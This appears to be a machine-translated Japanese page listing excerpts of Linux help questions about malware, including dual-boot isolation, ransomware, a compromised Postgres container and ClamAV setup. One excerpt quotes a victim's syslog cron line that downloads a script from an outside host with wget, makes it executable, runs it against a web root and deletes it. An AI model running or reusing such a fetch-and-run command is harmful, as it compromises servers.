malware

あるディストリビューションのマルウェアがデュアル/マルチブートシステムの他のディストリビューションに感染するのを防ぎますか?
malware

あるディストリビューションのマルウェアがデュアル/マルチブートシステムの他のディストリビューションに感染するのを防ぎますか?

私はマルチブート機能を持つコンピュータをセットアップしようとしています。 3つから5つの異なるLinuxディストリビューション、おそらくFreeBSD、OpenIndiana、Windowsなどです。 1つのパーティションをすべてのLinuxシステムのスワップとして使用し、1つのLinuxディストリビューションを使用して別々のブートパーティションにGRUBブートローダをインストールして維持するなど、複数のSSDをパーティション化します。独自のパーティション(ルートおよび他のすべてのパーティション) とにかくLinuxディストリビューションの1つは、基本的にさ...

Admin

削除されたように見え、Windowsウイルスに感染している可能性があるフラッシュドライブからデータを回復する方法は?
malware

削除されたように見え、Windowsウイルスに感染している可能性があるフラッシュドライブからデータを回復する方法は?

私は、重要なデータを含む2つのパーティションを持つ256 GBのフラッシュドライブを持っています。今日、いくつかのファイルをコピーするには、フラッシュドライブを大学のWindowsコンピュータに接続する必要がありました。しかし、接続した後、両方のパーティションのすべてのデータが消え、名前は2つのファイルでした。バージョン.dllそしてusbdriver.exe...まだ一つあります。名前のないフォルダ...各パーティションで。私はFedora 38を使用しています。今データをどのように回復しますか? ...

Admin

Linuxログイン用の強力なパスワードとランサムウェア
malware

Linuxログイン用の強力なパスワードとランサムウェア

ローカルネットワークにLinuxコンピュータが接続されているとします。このコンピュータにログインした瞬間、私だけが知る強力なパスワードが使用されました。 他のコンピュータを介して自分のネットワークに侵入したランサムウェアは、Linuxコンピュータのデータにアクセスできますか? ランサムウェアはLinuxコンピュータのデータを変更できますか? ランサムウェアが資格情報を盗むのに堪能であることを読んだ。 ...

Admin

私のPostgres Dockerコンテナがハッキング/感染した方法
malware

私のPostgres Dockerコンテナがハッキング/感染した方法

私のVPSに感染しましたkdevtmpfsi マルウェア、二重。それが問題です。初めて感染してから可能なすべての予防措置を取ったが、今回はどのようにまた感染したのか分からない。 どちらの状況も postgres docker コンテナが原因で発生します。初めて感染した後、 POSTGRES_PASSWORD公式ドッカーイメージを始めるために最強のキャラクター20個を使用しpostgres、 Dockerコンテナからホストへのポートマッピングを削除しました。 postgresは、自分が作成したドッカーネットワークを使用している他のドッカーコンテナ(ホストマ...

Admin

SSHログイン:3回目の試行までパスワードが無効です(同じパスワード)
malware

SSHログイン:3回目の試行までパスワードが無効です(同じパスワード)

仮想サーバーにログインしようとすると、パスワードがただ3回目の試みで成功しました! (使用同じ&正しいクリップボードのパスワード) システムが破損していますか? ! 興味深いことに、パスワードマネージャを使用すると、パスワードを文字ごとに入力するのに約0.5秒しかかからず、すぐに機能します。 尋ねる:ここで何が起こっているのか、どうすればわかりますか? 注意事項 セントOS 8 ルートを使わずに 秘密鍵を使用してログイン SSH ルートログインが無効になっています。 セッション内のsudoコマンドも機能しません(パスワードマネージャを使用しない限...

Admin

user:psaclnに戻すと、私のファイルは再び感染します。
malware

user:psaclnに戻すと、私のファイルは再び感染します。

ディレクトリへの書き込み権限をオフにしますrm -v filename。を使用してファイルを再作成し、touch filenameを使用してコンテンツを追加することもできますnano filename。しかし、一度私のchown user:psacln filenameファイルはすぐに再感染しました。 再感染とは、ファイルの内容が変更され、権限が444に変更されたことを意味します。私はPleskを使ってファイルを含むウェブサイトをホストします。そのホームページはWordPressのホームページです。 WP、テーマ、プラグインはすべて最新の状態です。 ...

Admin

Debian 11でClamAVを設定する方法は? (サンプルclamd.confと正しい場所が必要です)
malware

Debian 11でClamAVを設定する方法は? (サンプルclamd.confと正しい場所が必要です)

Debian 9からDebian10/11にアップグレードした後、Clamscanは以前にすべてのスキャンを正常に完了するのではなく、メモリ不足のシステムをすぐに実行します。 ただし、/etc/clamav/clamd.confファイルは存在しません。clamd.confシステムにもファイルが存在しません。 このファイルはどこに属しますか?私たちだけのものを作ることができますか?最新のサンプルファイルはどこで入手できますかconf? ...

Admin

システムログでPHPマルウェアを発見
malware

システムログでPHPマルウェアを発見

1分ごとに実行されるマルウェアがあり、/var/log/syslogで見ることができます。 Feb 1 18:30:01 MENCH CRON[1768]: (www-data) CMD (wget -q -O xxxd http://hello.hahaha666.xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /var/www/website.com 24 && rm -f xxxd) どのPHPスクリプトが実行されているのか、どうすればわかりますか? サーバーに...

Admin

仮想マシンでマルウェア分析を保護しますか?
malware

仮想マシンでマルウェア分析を保護しますか?

いくつかのウェブサイトでCuckooが古く、サポートされなくなり、死んだプロジェクトという内容を読みました。とにかくインストールするのが賢明ですか?ランサムウェアを自由に実行できるランサムウェア分析室があればいいのですが(サンドボックスがないと仮想環境から抜け出すかと思って少し心配されますが)他には特にサンドボックスボックスは必要ありませんが…ダイナミックレジストリキーの操作/API呼び出しなどマルウェア/ランサムウェア行為分析 または、仮想マシンに仮想マシンをインストールできますか?(この場合、ホストはUbuntuでゲストはWindowsです) ...

Admin

ClamAVがトロイの木馬を検出しました。次のステップは何ですか?
malware

ClamAVがトロイの木馬を検出しました。次のステップは何ですか?

オペレーティングシステム:Arch linux ltsカーネル。 今日私のコンピュータでclamAVを実行しましたが、Unix.Trojan.MSShellcode-10コードを含む感染ファイルが生成されました。 それから私は全体的なウイルス分析ファイル。 69のサプライヤーのうち、2つのサプライヤー(googleとclamAV)がこれを悪意のあるものとして識別しました。 このファイルは、公式ホームページから指す急流からダウンロードしたvmware kali linux配布イメージの一部です。 実行すると、デコードされsigtool --find-sigs ...

Admin

ワインをより安全に使用する方法は何ですか?
malware

ワインをより安全に使用する方法は何ですか?

Wineをインストールした後、ルートフォルダに直接アクセスできるazドライブがあることがわかりました。私はワインを介してLinuxシステムに影響を与えるウイルスに関する多くの投稿やニュースを見ました。どうすればより安全になりますか? ...

Admin

私のウェブカメラはハッキングされましたか?
malware

私のウェブカメラはハッキングされましたか?

Linux(Ubuntu)のユーザーはここをクリックしてください。私は長い間Linuxを使ってきたので、コマンドラインに慣れてきました。だから私はこの問題を解決するのに役立つアドバイスやツールを探しています。これが助けを求めるのに適したプラットフォームでない場合は、正しい方向を教えてください。 私のウェブカメラがハッキングされたかどうかはどうすればわかりますか? 通常、ブラウザを起動すると、インジケータがしばらく点灯します(通常はChromeから)。 通常、右クリックするとしばらくインジケーターが点灯します。 システムを再起動するたびに、インジケータが...

Admin